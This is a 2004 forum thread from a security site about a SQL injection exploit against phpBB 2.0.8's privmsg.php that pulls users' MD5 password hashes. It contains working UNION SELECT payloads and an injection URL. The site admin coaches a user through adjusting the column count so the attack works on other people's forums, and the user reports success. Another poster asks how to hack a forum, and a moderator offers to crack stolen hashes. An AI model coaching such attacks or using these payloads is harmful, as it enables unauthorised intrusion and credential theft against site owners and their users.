 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
phpBB 208 sqlinjection |
 |
 Posted: Wed Sep 08, 2004 9:00 pm |
 |
|
| w00 |
| Regular user |
 |
|
| Joined: Sep 08, 2004 |
| Posts: 8 |
|
|
|
 |
|
 |
|
Hello, i tried the phpBB 208 sqlinjeciotn exploit, wich expose the admin or any other users MD5 hash. But the thing is i cant get it to work on some phpBB forums. I come in debug mode. This is the debug i get (posted below) is there anyway i can modify the sql injection a little bit so it works on other sites too? Thanks for any help.
*i replaced the real name with HOST
| Code: |
Could not query private message post information
DEBUG MODE
SQL Error : 1222 The used SELECT statements have a different number of columns
SELECT u.username AS username_1, u.user_id AS user_id_1, u2.username AS username_2, u2.user_id AS user_id_2, u.user_sig_bbcode_uid, u.user_posts, u.user_from, u.user_website, u.user_email, u.user_icq, u.user_aim, u.user_yim, u.user_regdate, u.user_msnm, u.user_viewemail, u.user_rank, u.user_sig, u.user_avatar, pm.*, pmt.privmsgs_bbcode_uid, pmt.privmsgs_text FROM phpbbHOST_privmsgs pm, phpbbHOST_privmsgs_text pmt, phpbbHOST_users u, phpbbHOST_users u2 WHERE pm.privmsgs_id = 99 AND pmt.privmsgs_text_id = pm.privmsgs_id AND pm.privmsgs_type=-99 UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,0,user_password FROM phpbb_users WHERE user_id=2 LIMIT 1/*AND ( ( pm.privmsgs_to_userid = 1087 AND pm.privmsgs_type = 3 ) OR ( pm.privmsgs_from_userid = 1087 AND pm.privmsgs_type = 4 ) ) AND u.user_id = pm.privmsgs_from_userid AND u2.user_id = pm.privmsgs_to_userid
Line : 238
File : /home/fhlinux194/p/HOST.com/user/htdocs/phpBB2/privmsg.php
|
|
|
|
|
|
|
|
|
|
| Posted: Wed Sep 08, 2004 9:06 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Well, sql error message is clear:
"SQL Error : 1222 The used SELECT statements have a different number of columns"
So you have to
1. count, how many columns original query contains
2. modify UNION query according to previous results. |
|
|
|
|
|
|
|
|
| Posted: Wed Sep 08, 2004 9:35 pm |
|
|
| w00 |
| Regular user |
|
|
| Joined: Sep 08, 2004 |
| Posts: 8 |
|
|
|
|
|
|
|
| waraxe wrote: | Well, sql error message is clear:
"SQL Error : 1222 The used SELECT statements have a different number of columns"
So you have to
1. count, how many columns original query contains
2. modify UNION query according to previous results. |
yes, that was my point actually. Im sorry i made it unclear what my problem really is. I dont know how to count the columns in a phpbb forum. I dont suppose they mean the amount of "threats" there are like "C++", "Visual Basic" etc. And were exactly do i modify the the amount of columns? Do i change the amount of "NULL's" to the amount of columns present? And about the union, guess thats automaticly corrected after the columns are corrected, or am i wrong here too? |
|
|
|
|
|
|
|
|
| Posted: Thu Sep 09, 2004 11:10 am |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
If we look at original UNION query -
"UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,0,user_password FROM phpbb_users",
then we can count 31 columns.
For some reason that phpbb installation has different number of colums
in related table. Probably more than 31, but it can be less too. Sql error message is not telling us "more" or "less", just "not equal".
So start with 29 or 30 columns and then move further - 31, 32,33, etc.
If you will get no more this sql error (#SQL 1222 ), then you have now tweaked column count in union query. And next maybe you need to reposition output columns - "username" and "user_password". |
|
|
|
|
| Posted: Thu Sep 09, 2004 1:30 pm |
|
|
| w00 |
| Regular user |
|
|
| Joined: Sep 08, 2004 |
| Posts: 8 |
|
|
|
|
|
|
|
| Thanks waraxe, i cant thank you enough. Thanks to you i got it to work. |
|
|
|
|
| Posted: Thu Sep 09, 2004 2:55 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
I'm happy to help!  |
|
|
|
|
| Posted: Wed Nov 17, 2004 9:43 am |
|
|
| Wang |
| Regular user |
|
|
| Joined: Oct 30, 2004 |
| Posts: 5 |
|
|
|
|
|
|
|
privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%10pm.privmsgs_type=-99%10UNION%10SELECT%20username,null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%A0GET%A0phpbb_users%A0POST%A0user_level=1%A0LIMIT%A05/*
that string doesn't work  how do i hack a forum 2.0.8. phpbb  |
|
|
|
|
| Posted: Wed Dec 01, 2004 2:05 am |
|
|
| ToXiC |
| Moderator |
 |
|
| Joined: Dec 01, 2004 |
| Posts: 181 |
| Location: Cyprus |
|
|
|
|
|
|
| try md5 hash tables ... or just pm me the hash i will try to crack it .. |
|
|
|
|
|
|
|
|
| Posted: Tue Dec 14, 2004 6:03 pm |
|
|
| katz |
| Beginner |
|
|
| Joined: Oct 09, 2004 |
| Posts: 2 |
|
|
|
|
|
|
|
I'm sorry if this is unapropriate but at a version 2.0.6 i got an error | Quote: | Could not query private message post information
DEBUG MODE
SQL Error : 1064 You have an error in your SQL syntax near 'UNION SELECT username,null,user_password,null,null,null,null,null,null,null,null' at line 5
SELECT u.username AS username_1, u.user_id AS user_id_1, u2.username AS username_2, u2.user_id AS user_id_2, u.user_sig_bbcode_uid, u.user_posts, u.user_from, u.user_website, u.user_email, u.user_icq, u.user_aim, u.user_yim, u.user_regdate, u.user_msnm, u.user_viewemail, u.user_rank, u.user_sig, u.user_avatar, pm.*, pmt.privmsgs_bbcode_uid, pmt.privmsgs_text FROM forums_privmsgs pm, forums_privmsgs_text pmt, forums_users u, forums_users u2 WHERE pm.privmsgs_id = 99 AND pmt.privmsgs_text_id = pm.privmsgs_id AND pm.privmsgs_type=-99 UNION SELECT username,null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM phpbb_users WHERE user_level=1 LIMIT 1/*AND ( ( pm.privmsgs_to_userid = 92 AND pm.privmsgs_type = 3 ) OR ( pm.privmsgs_from_userid = 92 AND pm.privmsgs_type = 4 ) ) AND u.user_id = pm.privmsgs_from_userid AND u2.user_id = pm.privmsgs_to_userid
Line : 246
File : /var/www/forums/privmsg.php |
Do I have to change anything in the url from the original statement in http://waraxe.us/?modname=sa&id=013 ?? |
|
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 59
Members: 0
Total: 59
